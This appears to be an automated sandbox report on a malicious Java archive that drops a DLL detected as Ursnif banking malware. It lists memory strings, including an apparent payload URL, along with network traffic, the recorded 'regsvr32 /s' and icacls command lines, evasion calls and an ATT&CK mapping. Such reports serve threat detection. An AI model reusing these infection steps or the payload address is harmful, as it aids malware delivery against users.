Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.univision.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.walmart.com/favicon.ico
Source: msapplication.xml6.7.dr	String found in binary or memory: http://www.wikipedia.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.ya.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www.yam.com/favicon.ico
Source: msapplication.xml7.7.dr	String found in binary or memory: http://www.youtube.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&Version=2008-06-26&Operation
Source: java.exe, 00000002.00000002.257691436.0000000016833000.00000002.00000001.sdmp	String found in binary or memory: http://z.about.com/m/a08.ico
Source: notice[1].js0.8.dr	String found in binary or memory: https://api-js-log.trustarc.com/error
Source: 0D070042D9C67A68E1A4BF804E6E0E06.cache[1].htm.8.dr	String found in binary or memory: https://bugzilla.mozilla.org/show_bug.cgi?id=238559
Source: ~DF9F66EA97E71930AD.TMP.7.dr	String found in binary or memory: https://consent-pref.trustarc.com/?type=oracle6&site=oracle.com&action=notice&country=ch&locale=en&b
Source: ~DF9F66EA97E71930AD.TMP.7.dr	String found in binary or memory: https://consent-pref.trustarc.com/cookie_inneriframe.html
Source: ~DF9F66EA97E71930AD.TMP.7.dr	String found in binary or memory: https://consent-pref.trustarc.com/defaultpreferencemanager/0D070042D9C67A68E1A4BF804E6E0E06.cache.ht
Source: notice[1].js0.8.dr	String found in binary or memory: https://consent.trustarc.com/
Source: ~DF9F66EA97E71930AD.TMP.7.dr	String found in binary or memory: https://consent.trustarc.com/get?name=crossdomain.html&domain=oracle.com
Source: notice[1].js0.8.dr	String found in binary or memory: https://consent.trustarc.com/log
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp, java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp	String found in binary or memory: https://docs.cyberservices.biz/presentation.dll
Source: renderer[1].js.8.dr	String found in binary or memory: https://github.com/requirejs/requirejs/blob/master/LICENSE
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com
Source: java.exe, 00000002.00000002.252326380.000000000A445000.00000004.00000001.sdmp	String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: ~DF9F66EA97E71930AD.TMP.7.dr	String found in binary or memory: https://prefmgr-cookie.truste-svc.net/cookie_js/cookie_iframe.html?parent=https://consent-pref.trust
Source: ~DF9F66EA97E71930AD.TMP.7.dr, en[1].htm.8.dr	String found in binary or memory: https://s.go-mpulse.net/boomerang/
Source: ~DF9F66EA97E71930AD.TMP.7.dr, en[1].htm.8.dr	String found in binary or memory: https://s2.go-mpulse.net/boomerang/
Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp	String found in binary or memory: https://sectigo.com/CPS
Source: java.exe, 00000002.00000002.251586280.000000000A20F000.00000004.00000001.sdmp, SECURE_VIEWER.RSA	String found in binary or memory: https://sectigo.com/CPS0
Source: en[1].htm.8.dr	String found in binary or memory: https://static.oracle.com/cdn/cec/v21.2.1.30
Source: en[1].htm.8.dr	String found in binary or memory: https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/controller.js
Source: ~DF9F66EA97E71930AD.TMP.7.dr	String found in binary or memory: https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/renderer.js
Source: ~DF9F66EA97E71930AD.TMP.7.dr	String found in binary or memory: https://static.oracle.com/cdn/cec/v21.2.1.30/_sitesclouddelivery/renderer/require.js
Source: notice[1].js0.8.dr	String found in binary or memory: https://trustarc.mgr.consensu.org/

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734

Source: unknown	HTTPS traffic detected: 143.204.209.41:443 -> 192.168.2.3:49722 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.209.41:443 -> 192.168.2.3:49723 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.209.31:443 -> 192.168.2.3:49729 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.209.31:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.209.88:443 -> 192.168.2.3:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 143.204.209.88:443 -> 192.168.2.3:49731 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.181.18.61:443 -> 192.168.2.3:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.181.18.61:443 -> 192.168.2.3:49733 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.202.206.65:443 -> 192.168.2.3:49737 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.202.206.65:443 -> 192.168.2.3:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 50.87.249.219:443 -> 192.168.2.3:49735 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000A.00000003.401528922.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 10.3.regsvr32.exe.3208d23.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.4d70000.2.unpack, type: UNPACKEDPE

E-Banking Fraud:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000A.00000003.401528922.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 10.3.regsvr32.exe.3208d23.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.4d70000.2.unpack, type: UNPACKEDPE

Source: C:\Windows\SysWOW64\regsvr32.exe

Process Stats: CPU usage > 98%

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 10_2_04D72485 NtQueryVirtualMemory,

10_2_04D72485

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D72264	10_2_04D72264
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D80CF3	10_2_04D80CF3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D85C73	10_2_04D85C73
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D9246B	10_2_04D9246B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D91C3F	10_2_04D91C3F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D9DD4C	10_2_04D9DD4C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D9204B	10_2_04D9204B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D9784A	10_2_04D9784A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D9186B	10_2_04D9186B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D889D3	10_2_04D889D3
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D97960	10_2_04D97960
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D87131	10_2_04D87131
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D91398	10_2_04D91398
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D7FB80	10_2_04D7FB80
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D9A357	10_2_04D9A357

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\broker.dll 59767B2AC03EB8320A661F410D53A025C8975B12DE796E80B1C84306200F6A75

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 04D85BF0 appears 56 times
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: String function: 04D882D2 appears 31 times

Source: C:\Windows\SysWOW64\regsvr32.exe

Section loaded: sfc.dll

Jump to behavior

Source: classification engine

Classification label: mal80.troj.expl.winJAR@13/82@19/7

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2168:120:WilError_01

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user

Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Section loaded: C:\Program Files (x86)\Java\jre1.8.0_211\bin\client\jvm.dll

Jump to behavior

Source: C:\Program Files\internet explorer\iexplore.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: presentation.jar	Virustotal: Detection: 19%
Source: presentation.jar	ReversingLabs: Detection: 41%

Source: java.exe

String found in binary or memory: z0.in-addr.arpa

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'' >> C:\cmdlinestart.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.java.com/
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4812 CREDAT:17410 /prefetch:2
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.java.com/	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll	Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe	Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4812 CREDAT:17410 /prefetch:2	Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll

Jump to behavior

Source:

Binary string: c:\119\Minute\Force_Lead\Apple\oil.pdb source: regsvr32.exe, 0000000A.00000002.477390271.0000000004DA4000.00000002.00020000.sdmp, broker.dll.2.dr

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 10_2_04D71F31 LoadLibraryA,GetProcAddress,

10_2_04D71F31

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_3_1529C2E7 pushad ; retf	2_3_1529C2FD
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_3_1529CAF0 push 181529C9h; retf	2_3_1529CB11
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D72253 push ecx; ret	10_2_04D72263
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D72200 push ecx; ret	10_2_04D72209
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D85C35 push ecx; ret	10_2_04D85C48
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D8439D push ecx; ret	10_2_04D843B0

Persistence and Installation Behavior:

Exploit detected, runtime environment dropped PE file

Show sources

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File created: broker.dll.2.dr

Jump to dropped file

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File created: C:\Users\user\AppData\Local\broker.dll

Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000A.00000003.401528922.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 10.3.regsvr32.exe.3208d23.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.4d70000.2.unpack, type: UNPACKEDPE

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M

Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\broker.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess

graph_10-15915

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 6564	Thread sleep count: 178 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4332	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4332	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4332	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4332	Thread sleep count: 179 > 30	Jump to behavior

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: java.exe, 00000002.00000002.256885576.0000000015D30000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: java.exe, 00000002.00000002.241177068.0000000002A80000.00000004.00000001.sdmp	Binary or memory string: ,java/lang/VirtualMachineError
Source: java.exe, 00000002.00000002.241177068.0000000002A80000.00000004.00000001.sdmp	Binary or memory string: \|[Ljava/lang/VirtualMachineError;
Source: java.exe, 00000002.00000002.256885576.0000000015D30000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: java.exe, 00000002.00000002.256885576.0000000015D30000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: java.exe, 00000002.00000002.256885576.0000000015D30000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Windows\SysWOW64\regsvr32.exe

API call chain: ExitProcess graph end node

graph_10-15917

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 10_2_04D839FC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

10_2_04D839FC

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 10_2_04D71F31 LoadLibraryA,GetProcAddress,

10_2_04D71F31

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04DE2668 mov eax, dword ptr fs:[00000030h]	10_2_04DE2668
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04DE259E mov eax, dword ptr fs:[00000030h]	10_2_04DE259E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04DE21A5 push dword ptr fs:[00000030h]	10_2_04DE21A5

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D8CC83 __decode_pointer,SetUnhandledExceptionFilter,	10_2_04D8CC83
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D8CC61 SetUnhandledExceptionFilter,__encode_pointer,	10_2_04D8CC61
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D85618 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_04D85618
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D839FC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_04D839FC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 10_2_04D85973 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_04D85973

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Memory protected: page read and write | page guard

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\presentation.jar'	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' https://www.java.com/	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\AppData\Local\broker.dll	Jump to behavior

Source: regsvr32.exe, 0000000A.00000002.476926961.0000000003830000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: regsvr32.exe, 0000000A.00000002.476926961.0000000003830000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: regsvr32.exe, 0000000A.00000002.476926961.0000000003830000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: regsvr32.exe, 0000000A.00000002.476926961.0000000003830000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 10_2_04DA0ADD cpuid

10_2_04DA0ADD

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,	10_2_04D71566
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	10_2_04D8CCD5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,_ProcessCodePage,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itoa_s,	10_2_04D8FC43
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	10_2_04D8FC07
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,	10_2_04D8F6FD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,__invoke_watson,___crtGetLocaleInfoA,	10_2_04D966E4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LcidFromHexString,GetLocaleInfoA,	10_2_04D8F7DF
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoW_stat,	10_2_04DA0881
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLastError,_malloc,WideCharToMultiByte,__freea,GetLocaleInfoA,	10_2_04DA08BC
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,InterlockedDecrement,	10_2_04D8D879
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,_LcidFromHexString,_GetPrimaryLen,_strlen,	10_2_04D8F875
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	10_2_04DA09F9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	10_2_04D8FAB7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: GetLocaleInfoA,	10_2_04D9DA64
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	10_2_04D8FBA2
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: EnumSystemLocalesA,	10_2_04D8FB78
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: __calloc_crt,__malloc_crt,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,	10_2_04D8D364

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 10_2_04D717A7 SetThreadPriority,GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

10_2_04D717A7

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 10_2_04D9CD0B __lock,__invoke_watson,__invoke_watson,__invoke_watson,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,GetTimeZoneInformation,__invoke_watson,__invoke_watson,

10_2_04D9CD0B

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 10_2_04D7146C CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

10_2_04D7146C

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000A.00000003.401528922.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 10.3.regsvr32.exe.3208d23.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.4d70000.2.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 0000000A.00000003.401528922.0000000003200000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 10.3.regsvr32.exe.3208d23.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.regsvr32.exe.4d70000.2.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Command and Scripting Interpreter2	Services File Permissions Weakness1	Process Injection12	Masquerading1	OS Credential Dumping	System Time Discovery2	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel12	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API2	DLL Side-Loading1	Services File Permissions Weakness1	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery121	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Exploitation for Client Execution2	Logon Script (Windows)	DLL Side-Loading1	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Process Injection12	NTDS	Process Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
